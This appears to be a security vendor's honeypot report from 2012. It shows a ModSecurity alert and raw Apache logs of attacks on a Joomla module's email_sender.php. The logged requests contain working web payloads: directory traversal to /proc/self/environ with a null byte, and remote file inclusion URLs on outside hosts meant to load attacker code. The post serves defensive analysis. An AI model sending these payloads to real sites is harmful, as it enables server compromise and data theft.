Our web honeypots generated the following ModSecurity alert today:
[Thu Jan 19 17:55:55 2012] [error] [client 218.145.160.100] ModSecurity: Warning. Pattern match ".*" at TX:950103-WEB_ATTACK/DIR_TRAVERSAL-ARGS:spo_site_lang. [file "/usr/local/apache/conf/crs/base_rules/modsecurity_slr_46_lfi_attacks.conf"] [line "6379"] [id "2074201"] [rev "011712"] [msg "SLR: Simple Page Options Module for Joomla! modules/mod_spo/email_sender.php spo_site_lang Parameter Traversal Local File Inclusion"] [data "../../../../../../../../../../../../..//proc/self/environ\\x0000"] [severity "CRITICAL"] [tag "WEB_ATTACK/LFI"] [tag "http://osvdb.org/show/osvdb/74201"] [hostname "XXXXXXXXX"] [uri "/modules/mod_spo/email_sender.php"] [unique_id "TxgfUsCoAWQAATMwHvsAAAAB"]
This rule is part of our commercial rules feed for ModSecurity which identifies attacks for known public vulnerabilties. After analyzing the logs, we found the following attacks:
218.145.160.100 - - [19/Jan/2012:17:55:55 +0900] "GET /modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 238218.145.160.100 - - [19/Jan/2012:18:05:26 +0900] "GET /modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 238218.145.160.100 - - [19/Jan/2012:18:09:52 +0900] "GET /modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=test?? HTTP/1.1" 404 238218.145.160.100 - - [19/Jan/2012:18:09:53 +0900] "GET /modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=http://mark.sk/images/save.jpg HTTP/1.1" 404 238218.145.160.100 - - [19/Jan/2012:18:09:54 +0900] "GET /modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=http://www.sansovinonline.com/e107_themes/templates/blues.txt?? HTTP/1.1" 404 238218.145.160.100 - - [19/Jan/2012:18:09:55 +0900] "GET /modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=http://www.practical-philosophy.org.uk/joomla/images/logo.png?? HTTP/1.1" 404 238218.145.160.100 - - [19/Jan/2012:18:17:17 +0900] "GET /modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=test?? HTTP/1.1" 404 238218.145.160.100 - - [19/Jan/2012:18:17:18 +0900] "GET /modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=http://mark.sk/images/save.jpg HTTP/1.1" 404 238218.145.160.100 - - [19/Jan/2012:18:17:18 +0900] "GET /modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=http://www.sansovinonline.com/e107_themes/templates/blues.txt?? HTTP/1.1" 404 238218.145.160.100 - - [19/Jan/2012:18:17:19 +0900] "GET /modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=http://www.practical-philosophy.org.uk/joomla/images/logo.png?? HTTP/1.1" 404 238
OSVDB lists the following about this known vulnerability in the Simple Page Options Joomla Module:
Simple Page Options Module for Joomla! contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to the modules/mod_spo/email_sender.php script not properly sanitizing user input, specifically directory traversal style attacks (e.g., ../../) supplied to the 'spo_site_lang' parameter. This may allow an attacker to include a file from the targeted host that contains arbitrary commands or code that will be executed by the vulnerable script. Such attacks are limited due to the script only calling files already on the target host. In addition, this flaw can potentially be used to disclose the contents of any file on the system accessible by the web server.
Even though the vulnerable code is supposed to only be vulnerable to Local File Inclusion (LFI) attacks, tt appears that the attacker is also attempting Remote File Inclusion (RFII) attacks as well.